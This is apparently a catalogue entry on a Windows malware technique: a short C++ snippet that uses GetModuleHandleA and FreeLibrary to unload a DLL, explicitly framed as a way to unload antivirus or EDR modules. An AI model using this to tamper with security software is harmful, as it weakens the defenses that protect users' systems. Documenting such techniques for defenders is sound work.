Windows C++ / Unloading Module with FreeLibrary

Author West Wind
Platform Windows
Language C++
Technique Unloading Module with FreeLibrary

Description:

This code demonstrates how the GetModuleHandleA and FreeLibrary functions can be used to unload a DLL from a process's memory.

  • GetModuleHandleA retrieves a handle to a module (such as a DLL) that is already loaded.
  • FreeLibrary frees a loaded DLL from the process's memory.

This technique can be used maliciously to unload security-related DLLs used by antivirus or EDR solutions. As such, it is important to use such code ethically and responsibly, within the bounds of the law and ethical considerations.

Code

#include <windows.h>

int main()
{
  HMODULE hLibModule = GetModuleHandleA("av_edr_dllName.dll");
  FreeLibrary(hLibModule);
  return 0;
}

Created

March 19, 2023

Last Revised

April 22, 2024